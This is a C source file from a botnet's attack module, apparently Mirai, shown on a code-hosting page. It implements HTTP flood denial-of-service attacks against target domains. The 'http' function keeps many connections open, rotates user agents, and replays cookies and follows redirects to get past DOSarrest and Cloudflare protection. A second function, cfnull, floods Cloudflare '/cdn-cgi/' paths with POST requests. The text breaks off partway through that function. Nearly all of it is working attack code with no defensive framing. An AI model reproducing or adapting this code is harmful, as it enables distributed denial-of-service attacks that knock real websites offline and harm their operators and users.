Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 1176 lines (987 sloc) 46.9 KB
#define _GNU_SOURCE
#ifdef DEBUG
#include <stdio.h>
#endif
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include "includes.h"
#include "attack.h"
#include "rand.h"
#include "table.h"
#include "util.h"
void attack_app_proxy(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
}
void attack_app_http(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
int i, ii, rfd, ret = 0;
struct attack_http_state *http_table = NULL;
char *postdata = attack_get_opt_str(opts_len, opts, ATK_OPT_POST_DATA, NULL);
char *method = attack_get_opt_str(opts_len, opts, ATK_OPT_METHOD, "GET");
char *domain = attack_get_opt_str(opts_len, opts, ATK_OPT_DOMAIN, NULL);
char *path = attack_get_opt_str(opts_len, opts, ATK_OPT_PATH, "/");
int sockets = attack_get_opt_int(opts_len, opts, ATK_OPT_CONNS, 1);
port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 80);
char generic_memes[10241] = {0};
if (domain == NULL || path == NULL)
return;
if (util_strlen(path) > HTTP_PATH_MAX - 1)
return;
if (util_strlen(domain) > HTTP_DOMAIN_MAX - 1)
return;
if (util_strlen(method) > 9)
return;
// BUT BRAH WHAT IF METHOD IS THE DEFAULT VALUE WONT IT SEGFAULT CAUSE READ ONLY STRING?
// yes it would segfault but we only update the values if they are not already uppercase.
// if the method is lowercase and its passed from the CNC we can update that memory no problem
for (ii = 0; ii < util_strlen(method); ii++)
if (method[ii] >= 'a' && method[ii] <= 'z')
method[ii] -= 32;
if (sockets > HTTP_CONNECTION_MAX)
sockets = HTTP_CONNECTION_MAX;
// unlock frequently used strings
table_unlock_val(TABLE_ATK_SET_COOKIE);
table_unlock_val(TABLE_ATK_REFRESH_HDR);
table_unlock_val(TABLE_ATK_LOCATION_HDR);
table_unlock_val(TABLE_ATK_SET_COOKIE_HDR);
table_unlock_val(TABLE_ATK_CONTENT_LENGTH_HDR);
table_unlock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
table_unlock_val(TABLE_ATK_CHUNKED);
table_unlock_val(TABLE_ATK_KEEP_ALIVE_HDR);
table_unlock_val(TABLE_ATK_CONNECTION_HDR);
table_unlock_val(TABLE_ATK_DOSARREST);
table_unlock_val(TABLE_ATK_CLOUDFLARE_NGINX);
http_table = calloc(sockets, sizeof(struct attack_http_state));
for (i = 0; i < sockets; i++)
{
http_table[i].state = HTTP_CONN_INIT;
http_table[i].fd = -1;
http_table[i].dst_addr = targs[i % targs_len].addr;
util_strcpy(http_table[i].path, path);
if (http_table[i].path[0] != '/')
{
memmove(http_table[i].path + 1, http_table[i].path, util_strlen(http_table[i].path));
http_table[i].path[0] = '/';
}
util_strcpy(http_table[i].orig_method, method);
util_strcpy(http_table[i].method, method);
util_strcpy(http_table[i].domain, domain);
if (targs[i % targs_len].netmask < 32)
http_table[i].dst_addr = htonl(ntohl(targs[i % targs_len].addr) + (((uint32_t)rand_next()) >> targs[i % targs_len].netmask));
switch(rand_next() % 5)
{
case 0:
table_unlock_val(TABLE_HTTP_ONE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_ONE, NULL));
table_lock_val(TABLE_HTTP_ONE);
break;
case 1:
table_unlock_val(TABLE_HTTP_TWO);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_TWO, NULL));
table_lock_val(TABLE_HTTP_TWO);
break;
case 2:
table_unlock_val(TABLE_HTTP_THREE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_THREE, NULL));
table_lock_val(TABLE_HTTP_THREE);
break;
case 3:
table_unlock_val(TABLE_HTTP_FOUR);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FOUR, NULL));
table_lock_val(TABLE_HTTP_FOUR);
break;
case 4:
table_unlock_val(TABLE_HTTP_FIVE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FIVE, NULL));
table_lock_val(TABLE_HTTP_FIVE);
break;
}
util_strcpy(http_table[i].path, path);
}
while(TRUE)
{
fd_set fdset_rd, fdset_wr;
int mfd = 0, nfds;
struct timeval tim;
struct attack_http_state *conn;
uint32_t fake_time = time(NULL);
FD_ZERO(&fdset_rd);
FD_ZERO(&fdset_wr);
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->state == HTTP_CONN_RESTART)
{
if (conn->keepalive)
conn->state = HTTP_CONN_SEND;
else
conn->state = HTTP_CONN_INIT;
}
if (conn->state == HTTP_CONN_INIT)
{
struct sockaddr_in addr = {0};
if (conn->fd != -1)
close(conn->fd);
if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
continue;
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
ii = 65535;
setsockopt(conn->fd, 0, SO_RCVBUF, &ii ,sizeof(int));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = conn->dst_addr;
addr.sin_port = htons(dport);
conn->last_recv = fake_time;
conn->state = HTTP_CONN_CONNECTING;
connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
#ifdef DEBUG
printf("[http flood] fd%d started connect\n", conn->fd);
#endif
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_CONNECTING)
{
if (fake_time - conn->last_recv > 30)
{
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
continue;
}
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_SEND)
{
conn->content_length = -1;
conn->protection_type = 0;
util_zero(conn->rdbuf, HTTP_RDBUF_SIZE);
conn->rdbuf_pos = 0;
#ifdef DEBUG
//printf("[http flood] Sending http request\n");
#endif
char buf[10240];
util_zero(buf, 10240);
util_strcpy(buf + util_strlen(buf), conn->method);
util_strcpy(buf + util_strlen(buf), " ");
util_strcpy(buf + util_strlen(buf), conn->path);
util_strcpy(buf + util_strlen(buf), " HTTP/1.1\r\nUser-Agent: ");
util_strcpy(buf + util_strlen(buf), conn->user_agent);
util_strcpy(buf + util_strlen(buf), "\r\nHost: ");
util_strcpy(buf + util_strlen(buf), conn->domain);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_KEEP_ALIVE, NULL));
table_lock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT, NULL));
table_lock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT_LNG, NULL));
table_lock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), "\r\n");
if (postdata != NULL)
{
table_unlock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_TYPE, NULL));
table_lock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), "\r\n");
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL));
util_strcpy(buf + util_strlen(buf), " ");
util_itoa(util_strlen(postdata), 10, buf + util_strlen(buf));
util_strcpy(buf + util_strlen(buf), "\r\n");
}
if (conn->num_cookies > 0)
{
util_strcpy(buf + util_strlen(buf), "Cookie: ");
for (ii = 0; ii < conn->num_cookies; ii++)
{
util_strcpy(buf + util_strlen(buf), conn->cookies[ii]);
util_strcpy(buf + util_strlen(buf), "; ");
}
util_strcpy(buf + util_strlen(buf), "\r\n");
}
util_strcpy(buf + util_strlen(buf), "\r\n");
if (postdata != NULL)
util_strcpy(buf + util_strlen(buf), postdata);
if (!util_strcmp(conn->method, conn->orig_method))
util_strcpy(conn->method, conn->orig_method);
#ifdef DEBUG
if (sockets == 1)
{
printf("sending buf: \"%s\"\n", buf);
}
#endif
send(conn->fd, buf, util_strlen(buf), MSG_NOSIGNAL);
conn->last_send = fake_time;
conn->state = HTTP_CONN_RECV_HEADER;
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_RECV_HEADER)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_RECV_BODY)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_QUEUE_RESTART)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_CLOSED)
{
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
}
else
{
// NEW STATE WHO DIS
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
}
}
if (mfd == 0)
continue;
tim.tv_usec = 0;
tim.tv_sec = 1;
nfds = select(mfd, &fdset_rd, &fdset_wr, NULL, &tim);
fake_time = time(NULL);
if (nfds < 1)
continue;
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->fd == -1)
continue;
if (FD_ISSET(conn->fd, &fdset_wr))
{
int err = 0;
socklen_t err_len = sizeof (err);
ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
if (err == 0 && ret == 0)
{
#ifdef DEBUG
printf("[http flood] FD%d connected.\n", conn->fd);
#endif
conn->state = HTTP_CONN_SEND;
}
else
{
#ifdef DEBUG
printf("[http flood] FD%d error while connecting = %d\n", conn->fd, err);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
continue;
}
}
if (FD_ISSET(conn->fd, &fdset_rd))
{
if (conn->state == HTTP_CONN_RECV_HEADER)
{
int processed = 0;
util_zero(generic_memes, 10240);
if ((ret = recv(conn->fd, generic_memes, 10240, MSG_NOSIGNAL | MSG_PEEK)) < 1)
{
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
continue;
}
// we want to process a full http header (^:
if (util_memsearch(generic_memes, ret, "\r\n\r\n", 4) == -1 && ret < 10240)
continue;
generic_memes[util_memsearch(generic_memes, ret, "\r\n\r\n", 4)] = 0;
#ifdef DEBUG
if (sockets == 1)
printf("[http flood] headers: \"%s\"\n", generic_memes);
#endif
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CLOUDFLARE_NGINX, NULL)) != -1)
conn->protection_type = HTTP_PROT_CLOUDFLARE;
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_DOSARREST, NULL)) != -1)
conn->protection_type = HTTP_PROT_DOSARREST;
conn->keepalive = 0;
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONNECTION_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONNECTION_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *con_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
if (util_stristr(con_ptr, util_strlen(con_ptr), table_retrieve_val(TABLE_ATK_KEEP_ALIVE_HDR, NULL)))
conn->keepalive = 1;
}
}
conn->chunked = 0;
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *con_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
if (util_stristr(con_ptr, util_strlen(con_ptr), table_retrieve_val(TABLE_ATK_CHUNKED, NULL)))
conn->chunked = 1;
}
}
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *len_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
conn->content_length = util_atoi(len_ptr, 10);
}
} else {
conn->content_length = 0;
}
processed = 0;
while (util_stristr(generic_memes + processed, ret, table_retrieve_val(TABLE_ATK_SET_COOKIE_HDR, NULL)) != -1 && conn->num_cookies < HTTP_COOKIE_MAX)
{
int offset = util_stristr(generic_memes + processed, ret, table_retrieve_val(TABLE_ATK_SET_COOKIE_HDR, NULL));
if (generic_memes[processed + offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + processed + offset, ret - processed - offset, "\r\n", 2);
if (nl_off != -1)
{
char *cookie_ptr = &(generic_memes[processed + offset]);
if (nl_off >= 2)
nl_off -= 2;
if (util_memsearch(generic_memes + processed + offset, ret - processed - offset, ";", 1) > 0)
nl_off = util_memsearch(generic_memes + processed + offset, ret - processed - offset, ";", 1) - 1;
generic_memes[processed + offset + nl_off] = 0;
for (ii = 0; ii < util_strlen(cookie_ptr); ii++)
if (cookie_ptr[ii] == '=')
break;
if (cookie_ptr[ii] == '=')
{
int equal_off = ii, cookie_exists = FALSE;
for (ii = 0; ii < conn->num_cookies; ii++)
if (util_strncmp(cookie_ptr, conn->cookies[ii], equal_off))
{
cookie_exists = TRUE;
break;
}
if (!cookie_exists)
{
if (util_strlen(cookie_ptr) < HTTP_COOKIE_LEN_MAX)
{
util_strcpy(conn->cookies[conn->num_cookies], cookie_ptr);
conn->num_cookies++;
}
}
}
}
processed += offset;
}
// this will still work as previous handlers will only add in null chars or similar
// and we specify the size of the string to stristr
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *loc_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
//increment it one so that it is length of the string excluding null char instead of 0-based offset
nl_off++;
if (util_memsearch(loc_ptr, nl_off, "http", 4) == 4)
{
//this is an absolute url, domain name change maybe?
ii = 7;
//http(s)
if (loc_ptr[4] == 's')
ii++;
memmove(loc_ptr, loc_ptr + ii, nl_off - ii);
ii = 0;
while (loc_ptr[ii] != 0)
{
if (loc_ptr[ii] == '/')
{
loc_ptr[ii] = 0;
break;
}
ii++;
}
// domain: loc_ptr;
// path: &(loc_ptr[ii + 1]);
if (util_strlen(loc_ptr) > 0 && util_strlen(loc_ptr) < HTTP_DOMAIN_MAX)
util_strcpy(conn->domain, loc_ptr);
if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
}
else if (loc_ptr[0] == '/')
{
//handle relative url
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0 && util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
conn->state = HTTP_CONN_RESTART;
continue;
}
}
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_REFRESH_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_REFRESH_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *loc_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
//increment it one so that it is length of the string excluding null char instead of 0-based offset
nl_off++;
ii = 0;
while (loc_ptr[ii] != 0 && loc_ptr[ii] >= '0' && loc_ptr[ii] <= '9')
ii++;
if (loc_ptr[ii] != 0)
{
int wait_time = 0;
loc_ptr[ii] = 0;
ii++;
if (loc_ptr[ii] == ' ')
ii++;
if (util_stristr(&(loc_ptr[ii]), util_strlen(&(loc_ptr[ii])), "url=") != -1)
ii += util_stristr(&(loc_ptr[ii]), util_strlen(&(loc_ptr[ii])), "url=");
if (loc_ptr[ii] == '"')
{
ii++;
//yes its ugly, but i dont care
if ((&(loc_ptr[ii]))[util_strlen(&(loc_ptr[ii])) - 1] == '"')
(&(loc_ptr[ii]))[util_strlen(&(loc_ptr[ii])) - 1] = 0;
}
wait_time = util_atoi(loc_ptr, 10);
//YOLO LOL
while (wait_time > 0 && wait_time < 10 && fake_time + wait_time > time(NULL))
sleep(1);
loc_ptr = &(loc_ptr[ii]);
if (util_stristr(loc_ptr, util_strlen(loc_ptr), "http") == 4)
{
//this is an absolute url, domain name change maybe?
ii = 7;
//http(s)
if (loc_ptr[4] == 's')
ii++;
memmove(loc_ptr, loc_ptr + ii, nl_off - ii);
ii = 0;
while (loc_ptr[ii] != 0)
{
if (loc_ptr[ii] == '/')
{
loc_ptr[ii] = 0;
break;
}
ii++;
}
// domain: loc_ptr;
// path: &(loc_ptr[ii + 1]);
if (util_strlen(loc_ptr) > 0 && util_strlen(loc_ptr) < HTTP_DOMAIN_MAX)
util_strcpy(conn->domain, loc_ptr);
if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
}
else if (loc_ptr[0] == '/')
{
//handle relative url
if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
}
strcpy(conn->method, "GET");
// queue the state up for the next time
conn->state = HTTP_CONN_QUEUE_RESTART;
continue;
}
}
}
// actually pull the content from the buffer that we processed via MSG_PEEK
processed = util_memsearch(generic_memes, ret, "\r\n\r\n", 4);
if (util_strcmp(conn->method, "POST") || util_strcmp(conn->method, "GET"))
conn->state = HTTP_CONN_RECV_BODY;
else if (ret > processed)
conn->state = HTTP_CONN_QUEUE_RESTART;
else
conn->state = HTTP_CONN_RESTART;
ret = recv(conn->fd, generic_memes, processed, MSG_NOSIGNAL);
} else if (conn->state == HTTP_CONN_RECV_BODY) {
while (TRUE)
{
// spooky doods changed state
if (conn->state != HTTP_CONN_RECV_BODY)
{
break;
}
if (conn->rdbuf_pos == HTTP_RDBUF_SIZE)
{
memmove(conn->rdbuf, conn->rdbuf + HTTP_HACK_DRAIN, HTTP_RDBUF_SIZE - HTTP_HACK_DRAIN);
conn->rdbuf_pos -= HTTP_HACK_DRAIN;
}
errno = 0;
ret = recv(conn->fd, conn->rdbuf + conn->rdbuf_pos, HTTP_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
if (ret == 0)
{
#ifdef DEBUG
printf("[http flood] FD%d connection gracefully closed\n", conn->fd);
#endif
errno = ECONNRESET;
ret = -1; // Fall through to closing connection below
}
if (ret == -1)
{
if (errno != EAGAIN && errno != EWOULDBLOCK)
{
#ifdef DEBUG
printf("[http flood] FD%d lost connection\n", conn->fd);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
}
break;
}
conn->rdbuf_pos += ret;
conn->last_recv = fake_time;
while (TRUE)
{
int consumed = 0;
if (conn->content_length > 0)
{
consumed = conn->content_length > conn->rdbuf_pos ? conn->rdbuf_pos : conn->content_length;
conn->content_length -= consumed;
if (conn->protection_type == HTTP_PROT_DOSARREST)
{
// we specifically want this to be case sensitive
if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, table_retrieve_val(TABLE_ATK_SET_COOKIE, NULL), 11) != -1)
{
int start_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, table_retrieve_val(TABLE_ATK_SET_COOKIE, NULL), 11);
int end_pos = util_memsearch(&(conn->rdbuf[start_pos]), conn->rdbuf_pos - start_pos, "'", 1);
conn->rdbuf[start_pos + (end_pos - 1)] = 0;
if (conn->num_cookies < HTTP_COOKIE_MAX && util_strlen(&(conn->rdbuf[start_pos])) < HTTP_COOKIE_LEN_MAX)
{
util_strcpy(conn->cookies[conn->num_cookies], &(conn->rdbuf[start_pos]));
util_strcpy(conn->cookies[conn->num_cookies] + util_strlen(conn->cookies[conn->num_cookies]), "=");
start_pos += end_pos + 3;
end_pos = util_memsearch(&(conn->rdbuf[start_pos]), conn->rdbuf_pos - start_pos, "'", 1);
conn->rdbuf[start_pos + (end_pos - 1)] = 0;
util_strcpy(conn->cookies[conn->num_cookies] + util_strlen(conn->cookies[conn->num_cookies]), &(conn->rdbuf[start_pos]));
conn->num_cookies++;
}
conn->content_length = -1;
conn->state = HTTP_CONN_QUEUE_RESTART;
break;
}
}
}
if (conn->content_length == 0)
{
if (conn->chunked == 1)
{
if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, "\r\n", 2) != -1)
{
int new_line_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "\r\n", 2);
conn->rdbuf[new_line_pos - 2] = 0;
if (util_memsearch(conn->rdbuf, new_line_pos, ";", 1) != -1)
conn->rdbuf[util_memsearch(conn->rdbuf, new_line_pos, ";", 1)] = 0;
int chunklen = util_atoi(conn->rdbuf, 16);
if (chunklen == 0)
{
conn->state = HTTP_CONN_RESTART;
break;
}
conn->content_length = chunklen + 2;
consumed = new_line_pos;
}
} else {
// get rid of any extra in the buf before we move on...
conn->content_length = conn->rdbuf_pos - consumed;
if (conn->content_length == 0)
{
conn->state = HTTP_CONN_RESTART;
break;
}
}
}
if (consumed == 0)
break;
else
{
conn->rdbuf_pos -= consumed;
memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
conn->rdbuf[conn->rdbuf_pos] = 0;
if (conn->rdbuf_pos == 0)
break;
}
}
}
} else if (conn->state == HTTP_CONN_QUEUE_RESTART) {
while(TRUE)
{
errno = 0;
ret = recv(conn->fd, generic_memes, 10240, MSG_NOSIGNAL);
if (ret == 0)
{
#ifdef DEBUG
printf("[http flood] HTTP_CONN_QUEUE_RESTART FD%d connection gracefully closed\n", conn->fd);
#endif
errno = ECONNRESET;
ret = -1; // Fall through to closing connection below
}
if (ret == -1)
{
if (errno != EAGAIN && errno != EWOULDBLOCK)
{
#ifdef DEBUG
printf("[http flood] HTTP_CONN_QUEUE_RESTART FD%d lost connection\n", conn->fd);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
}
break;
}
}
if (conn->state != HTTP_CONN_INIT)
conn->state = HTTP_CONN_RESTART;
}
}
}
// handle any sockets that didnt return from select here
// also handle timeout on HTTP_CONN_QUEUE_RESTART just in case there was no other data to be read (^: (usually this will never happen)
#ifdef DEBUG
if (sockets == 1)
{
printf("debug mode sleep\n");
sleep(1);
}
#endif
}
}
void attack_app_cfnull(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
int i, ii, rfd, ret = 0;
struct attack_cfnull_state *http_table = NULL;
char *domain = attack_get_opt_str(opts_len, opts, ATK_OPT_DOMAIN, NULL);
int sockets = attack_get_opt_int(opts_len, opts, ATK_OPT_CONNS, 1);
char generic_memes[10241] = {0};
if (domain == NULL)
return;
if (util_strlen(domain) > HTTP_DOMAIN_MAX - 1)
return;
if (sockets > HTTP_CONNECTION_MAX)
sockets = HTTP_CONNECTION_MAX;
http_table = calloc(sockets, sizeof(struct attack_cfnull_state));
for (i = 0; i < sockets; i++)
{
http_table[i].state = HTTP_CONN_INIT;
http_table[i].fd = -1;
http_table[i].dst_addr = targs[i % targs_len].addr;
util_strcpy(http_table[i].domain, domain);
if (targs[i % targs_len].netmask < 32)
http_table[i].dst_addr = htonl(ntohl(targs[i % targs_len].addr) + (((uint32_t)rand_next()) >> targs[i % targs_len].netmask));
switch(rand_next() % 5)
{
case 0:
table_unlock_val(TABLE_HTTP_ONE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_ONE, NULL));
table_lock_val(TABLE_HTTP_ONE);
break;
case 1:
table_unlock_val(TABLE_HTTP_TWO);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_TWO, NULL));
table_lock_val(TABLE_HTTP_TWO);
break;
case 2:
table_unlock_val(TABLE_HTTP_THREE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_THREE, NULL));
table_lock_val(TABLE_HTTP_THREE);
break;
case 3:
table_unlock_val(TABLE_HTTP_FOUR);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FOUR, NULL));
table_lock_val(TABLE_HTTP_FOUR);
break;
case 4:
table_unlock_val(TABLE_HTTP_FIVE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FIVE, NULL));
table_lock_val(TABLE_HTTP_FIVE);
break;
}
}
while(TRUE)
{
fd_set fdset_rd, fdset_wr;
int mfd = 0, nfds;
struct timeval tim;
struct attack_cfnull_state *conn;
uint32_t fake_time = time(NULL);
FD_ZERO(&fdset_rd);
FD_ZERO(&fdset_wr);
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->state == HTTP_CONN_RESTART)
{
conn->state = HTTP_CONN_INIT;
}
if (conn->state == HTTP_CONN_INIT)
{
struct sockaddr_in addr = {0};
if (conn->fd != -1)
close(conn->fd);
if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
continue;
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
ii = 65535;
setsockopt(conn->fd, 0, SO_RCVBUF, &ii ,sizeof(int));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = conn->dst_addr;
addr.sin_port = htons(80);
conn->last_recv = fake_time;
conn->state = HTTP_CONN_CONNECTING;
connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
#ifdef DEBUG
printf("[http flood] fd%d started connect\n", conn->fd);
#endif
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_CONNECTING)
{
if (fake_time - conn->last_recv > 30)
{
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
continue;
}
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_SEND_HEADERS)
{
#ifdef DEBUG
//printf("[http flood] Sending http request\n");
#endif
char buf[10240];
util_zero(buf, 10240);
//util_strcpy(buf + util_strlen(buf), "POST /cdn-cgi/l/chk_captcha HTTP/1.1\r\nUser-Agent: ");
util_strcpy(buf + util_strlen(buf), "POST /cdn-cgi/");
rand_alphastr(buf + util_strlen(buf), 16);
util_strcpy(buf + util_strlen(buf), " HTTP/1.1\r\nUser-Agent: ");
util_strcpy(buf + util_strlen(buf), conn->user_agent);
util_strcpy(buf + util_strlen(buf), "\r\nHost: ");
util_strcpy(buf + util_strlen(buf), conn->domain);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_KEEP_ALIVE, NULL));
table_lock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT, NULL));
table_lock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT_LNG, NULL));
table_lock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_TYPE, NULL));
table_lock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL));
table_lock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
